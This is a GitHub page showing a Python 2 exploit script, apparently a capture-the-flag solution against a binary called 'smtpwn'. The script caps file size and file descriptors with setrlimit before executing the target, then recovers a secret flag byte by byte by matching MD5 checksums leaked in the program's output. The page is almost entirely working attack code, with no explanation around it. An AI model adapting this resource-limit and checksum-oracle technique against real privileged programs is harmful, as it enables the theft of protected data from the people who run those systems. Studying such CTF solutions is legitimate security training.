Skip to content
Permalink
Branch: master
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
executable file 62 lines (45 sloc) 1.6 KB
#!/usr/bin/python2
import os
import sys
import socket
import getpass
import hashlib
from resource import *
from time import localtime, strftime
from subprocess import Popen, PIPE
FORMAT = 'Message-ID: <>\r\n' + \
'From: "%(username)s" <%(username)s@%(hostname)s>\r\n' + \
'To: "flagholder" <flagholder@%(hostname)s>\r\n' + \
'Date: %(date)s\r\n' + \
'X-Flag: %(flag)s'
def sploit(argc, argv):
hostname = socket.gethostname()
username = getpass.getuser()
#username = "smtpwn"
if argc > 1:
flag = argv[1]
date = strftime("%a, %d %B %Y %T +0100", localtime())
guessed_file = FORMAT % locals()
fsize = len(guessed_file) + 1
setrlimit(RLIMIT_FSIZE, (fsize, fsize,))
setrlimit(RLIMIT_NOFILE, (4, 4,))
os.execve("/home/smtpwn/smtpwn", [], {})
else:
final_flag = ''
while True:
date = strftime("%a, %d %B %Y %T +0100", localtime())
p = Popen([argv[0], final_flag],stdin=PIPE,stdout=PIPE,stderr=PIPE)
out = p.communicate("tg")[0]
checksum = out.split("checksum: ")[1].split(")")[0]
for c in range(255):
flag = final_flag + chr(c)
guessed_file = FORMAT % locals()
if hashlib.md5(guessed_file).hexdigest() == checksum:
print "[+]", flag
final_flag = flag
if c == 0x0A:
print "Final flag:", flag
return
break
if __name__ == "__main__":
sploit(len(sys.argv), sys.argv)
You can’t perform that action at this time.